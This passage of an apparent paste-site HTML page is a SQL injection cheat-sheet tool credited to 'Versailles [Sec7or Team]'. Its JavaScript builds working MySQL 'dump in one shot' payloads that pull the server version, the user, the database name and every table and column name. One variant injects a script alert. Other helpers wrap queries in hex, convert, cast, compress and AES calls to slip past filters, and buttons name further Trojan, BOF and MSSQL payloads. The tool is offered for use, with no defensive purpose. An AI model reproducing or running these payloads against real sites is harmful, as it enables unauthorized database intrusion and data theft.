  539. var mydios = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,0x496e6a6563746564204279205665727361696c6c65735c6e5c6e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d5c6e,0x55736572203e3e20,USER(),0x5c6e,0x44426e616d65203e3e20,DATABASE(),0x5c6e5c6e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d5c6e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d5c6e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d5c6e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)";
  540. document.getElementById('dios').value = mydios;
  541. }
  542.  
  543. function mydios2(){
  544. var mydios2 = "concat(0x496e6a6563746564204279205665727361696c6c65733c62723e,VERSION(),0x205b20,@@VERSION_COMPILE_OS,0x205d3c62723e,0x55736572203e3e20,USER(),0x3c62723e,0x44426e616d65203e3e20,DATABASE(),0x3c62723e,concat(0x546f74616c20446174616261736573205b20,(select+count(*)from+information_schema.schemata)),0x205d3c62723e,concat(0x546f74616c205461626c6573205b20,(select+count(*)from+information_schema.tables+where+table_Schema=database())),0x205d3c62723e,concat(0x546f74616c20436f6c756d6e73205b20,(select+count(*)from+information_schema.columns+where+table_Schema=database())),0x205d3c62723e,(select(@x)from(select(@x:=0x00),(@num:=0),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,LPAD(@num:=@num%2b1,3,0x30),0x2e20,table_name,0x203a3a20,column_name))))x))";
  545. document.getElementById('dios').value = mydios2;
  546. }
  547.  
  548. function hx(){
  549. var hx = prompt('Input Your Query','VERSION()');
  550. var hx = "hex(unhex("+hx+"))";
  551. document.getElementById('dios').value = hx;
  552. }
  553.  
  554. function cn(){
  555. var cn = prompt('Input Your Query','VERSION()');
  556. var cn = "convert("+cn+"+using+latin1)";
  557. document.getElementById('dios').value = cn;
  558. }
  559.  
  560. function cs(){
  561. var cs = prompt('Input Your Query','VERSION()');
  562. var cs = "cast("+cs+"+as+char)";
  563. document.getElementById('dios').value = cs;
  564. }
  565.  
  566. function cp(){
  567. var cp = prompt('Input Your Query','VERSION()');
  568. var cp = "uncompress(compress("+cp+")) ";
  569. document.getElementById('dios').value = cp;
  570. }
  571.  
  572. function aes(){
  573. var aes = prompt('Input Your Query','VERSION()');
  574. var aes = "aes_decrypt(aes_encrypt("+aes+",1),1)";
  575. document.getElementById('dios').value = aes;
  576. }
  577.  
  578. function tblc(){
  579. var tblc = alert("Count Total Tables with Table Name");
  580. var tblc = "concat(@c:=0x00,if((select+count(*)+from(information_schema.tables)where+table_schema=database()+and+@c:=concat(@c,0x3c6c693e,@tbl:=table_name,0x203a3a20,(select+count(*)from+information_schema.columns+where+table_Schema=database()+and+table_name=@tbl))),0x00,0x00),@c)";
  581. document.getElementById('dios').value = tblc;
  582. }
  583.  
  584. function dbc(){
  585. var dbc = alert("Count Total Databases");
  586. var dbc = "concat(0x546f74616c20446174616261736573203e3e20,(select+count(*)from+information_schema.schemata))";
  587. document.getElementById('dios').value = dbc;
  588. }
  589.  
  590. function tottbl(){
  591. var tottbl = alert("Count Total Tables");
  592. var tottbl = "concat(0x546f74616c205461626c6573203e3e20,(select+count(*)from+information_schema.tables+where+table_Schema=database()))";
  593. document.getElementById('dios').value = tottbl;
  594. }
  595.  
  596. function totcol(){
  597. var totcol = alert("Count Total Columns");
  598. var totcol = "concat(0x546f74616c20436f6c756d6e73203e3e20,(select+count(*)from+information_schema.columns+where+table_Schema=database()))";
  599. document.getElementById('dios').value = totcol;
  600. }
  601.  
  602. function countdb(){
  603. var countdb = alert("Count Total Databases with Database Name");
  604. var countdb = "(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x)"; document.getElementById('dios').value = countdb;
  605. }
  606.  
  607.  
  608.  
  609. function about(){
  610. var about = alert("Cheatsheet Collection Pakage V.3\n\nBy : Versailles [ Sec7or Team ]\n\nThankz to All Author the queries\n\nI love Mayu Watanabe (Mayuyu AKB48)\n\nGreets :\nM@dbl00d - Minato - Sn00.py -  1DIOT - Sayap Hitam - Penyair - Sanusi - Sohai - i3r_Code - Ajkaro - Zen - Trjnx - Janus - Makman - Kashmiri Cheetah - CodeNinja - UniQue - Cracker Bikash - and All Injector >_<");
  611. }
  615. </script>
  616. </head>
  617. <body>
  618. <center>
  619.  
  620. <div class="panel panel-default" style="width:700px;">
  621.  
  622. <h1>#Sec7or Team Tools</h1>
  623.  
  624. <br>
  625.  
  626. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#mc"><i class="glyphicon glyphicon-plus"></i> STRINGS TOOLS </button>
  627.  
  628. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#q"><i class="glyphicon glyphicon-plus"></i> QUERY </button>
  629.  
  630.  
  631. <div id="mc" class="collapse">
  632.  
  633. <textarea id="str" rows="5" cols="70" placeholder="Strings"></textarea>
  634.  <br>
  635. <button onclick="Str2Hex()"> Hex </button>
  636. <button onclick="Hex2Str()"> Unhex </button>
  637.  |
  638. <input onclick="b64_enc();" type=button value="Base64Enc" name="encode">
  639.       <input onclick="b64_dec();" type=button value="Base64Dec" name="decode">
  640.  |
  641. <input onclick="esc();" type=button value="Escape" name="encode">
  642.       <input onclick="unesc();" type=button value="Unescape" name="decode">
  643.  
  644. <br><br>
  645. <input type="text" size="25" id="wrd" placeholder="Words"> >>
  646. <input type="text" size="25" id="rep" placeholder="Replace">
  647. <input onclick="rplc();" type=button value="Replace All">
  648. <br><br>
  649.  
  650. <textarea id="hex" rows="5" cols="70" placeholder="Output">
  651. </textarea><br>
  652.  
  653. <br>
  654.  
  655. </div>
  656.  
  657. <div id="q" class="collapse">
  658. <br>
  659.  
  660. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#query"><i class="glyphicon glyphicon-plus"></i> DIOS QUERY </button>
  661.  
  662. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#sysvar"><i class="glyphicon glyphicon-plus"></i> SYSTEM VARIABLES </button>
  663.  
  664. <button type="button" class="btn btn-primary collapsed" style="margin-left: 15px;margin-bottom: 10px" data-toggle="collapse" data-target="#otr"><i class="glyphicon glyphicon-plus"></i> OTHER </button>
  665.  
  666. <br>
  667. <div id="query" class="collapse">
  668.  
  669. <div class="dios">
  670. <table class="table table-striped table-bordered table-hover datatable">
  671. <tr>
  672. <td class="text-center">
  673. ======= :: DUMP IN ONE SHOOT :: =======</td>
  674. </tr>
  675.  
  676. <tr><td class="text-center">
  677. <button onclick="dios1()">Dios 1</button>
  678. <button onclick="dios2()">Dios 2</button>
  679. <button onclick="dios3()">Dios 3</button>
  680. <button onclick="dios4()">Dios 4</button>
  681. <button onclick="xssdios()">XssDios </button>
  682. <button onclick="trjn()"> Trojan 1 </button>
  683. <button onclick="trjnx()"> Trojan 2 </button>
  684. <button onclick="bypsfrm()"> Bypass From </button>
  685. </td></tr>
  686.  
  687. <tr><td class="text-center">
  688. <button onclick="postgre()"> Postgre </button>
  689. <button onclick="mssql()"> Mssql </button>
  690. <button onclick="bof()"> BOF </button>
  691. <button onclick="mydios2()"> Mydios 2 </button>
  692. <button onclick="makman()"> Makman </button>
  693. <button onclick="ebf()"> ErrBased </button>
  694. <button onclick="poligon()"> Poligon </button>
  695. <button onclick="multipoint()"> Multipoint </button>
  696. </td></tr>
  697. </table>
  698. </div>
  699. </div>
  700.  
  701. <br>
  702.  
  703. <div id="sysvar" class="collapse">
  704.  
  705. <div class="sv">
  706. <table class="table table-striped table-bordered table-hover datatable">
  707. <tr>
  708. <td class="text-center">
  709. ======= :: SYSTEM VARIABLES :: =======</td>
  710. </tr>
  711. </table>
  712. <table class="table table-striped table-bordered table-hover datatable">
  713. <tr><td>VERSION </td><td class="text-center"><button onclick="version1()">Version 1</button>
  714. <button onclick="version2()">Version 2</button>
  715. <button onclick="version3()">Version 3</button>
  716. <button onclick="version4()">Version 4</button>
  717. <button onclick="version5()">Version 5</button>
  718. </td></tr>
  719.  
  720. <tr><td>USER </td><td class="text-center"><button onclick="user1()">User 1</button>
  721. <button onclick="user2()">User 2</button>
  722. <button onclick="user3()">User 3</button>
  723. <button onclick="user4()">User 4</button>
  724. <button onclick="user5()">User 5</button>
  725. <button onclick="user6()">User 6</button></td></tr>
  726.  
  727. <tr><td>DATABASE </td><td class="text-center"> <button onclick="db1()">Database 1</button>
  728. <button onclick="db2()">Database 2</button>
  729. <button onclick="db3()">Database 3</button></td></tr>
  730. </table>
  731. </div>
  732.  
  733.  
  734. <table class="table table-striped table-bordered table-hover datatable">
  735. <tr><td class="text-center">
  736. <button onclick="o1()"> @@HOSTNAME </button>
  737. <button onclick="o2()"> @@VERSION_COMPILE_MACHINE </button>
  738. <button onclick="o3()"> @@VERSION_COMPILE_OS </button>
  739. </td></tr>
  740.  
  741. <tr><td class="text-center">
  742. <button onclick="o4()"> @@BASEDIR </button>
  743. <button onclick="o5()"> @@HV_OPENSSL </button>
  744. <button onclick="o6()"> @@HV_SYMLINK </button>
  745. <button onclick="o7()"> @@PORT </button>
  746. <button onclick="o8()"> @@SOCKET </button>
  747. </td></tr>
  748. </table>
  749.  
  750. </div>
  751.  
  752.  
  753.  
  754. <div id="otr" class="collapse">
  755.  
  756. <div class="othr">
  757. <table class="table table-striped table-bordered table-hover datatable">
  758. <tr>
  759. <td class="text-center">
  760. ======= :: OTHERS :: =======</td>
  761. </tr>
  762. </table>
  763.  
  764. <table class="table table-striped table-bordered table-hover datatable">
  765. <tr><td class="text-center">
  766. <button onclick="xssqli()"> PopUP </button>
  767. <button onclick="kolom()"> Generate Column </button>
  768. <button onclick="mydios()"> MyDios </button>
  769. <button onclick="hx()"> Hex </button>
  770. <button onclick="cn()"> Convert </button>
  771. <button onclick="cs()"> Cast </button>
  772. <button onclick="cp()"> Compress </button>
  773. <button onclick="aes()"> Aes </button>
  774. </td></tr>
  775.  
  776. <tr><td class="text-center">
  777. <button onclick="dbc()"> Total Databases </button>
  778. <button onclick="tottbl()"> Total Tables </button>
  779. <button onclick="totcol()"> Total Columns </button>
  780. <button onclick="tblc()"> Total Col </button>
  781. <button onclick="countdb()"> Count DB </button>
  782. <button onclick="about()"> About </button>
  783. </td></tr>
  784. </table>
  785.  
  786. </div></div>
  787.  
  788. <br>
  789. <textarea id="dios" rows="5" cols="70" placeholder="Output">
  790. </textarea>
  791. <br>
  792.  
  793. </div>
  794. <br>
  795.  
  796. <hr>
  797. &copy; 2016 | Coded By <a href=https://facebook.com/thever.sevenfoldism>Versailles</a><br>
  798.  
  799. </div>
  800. </body>
  801. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!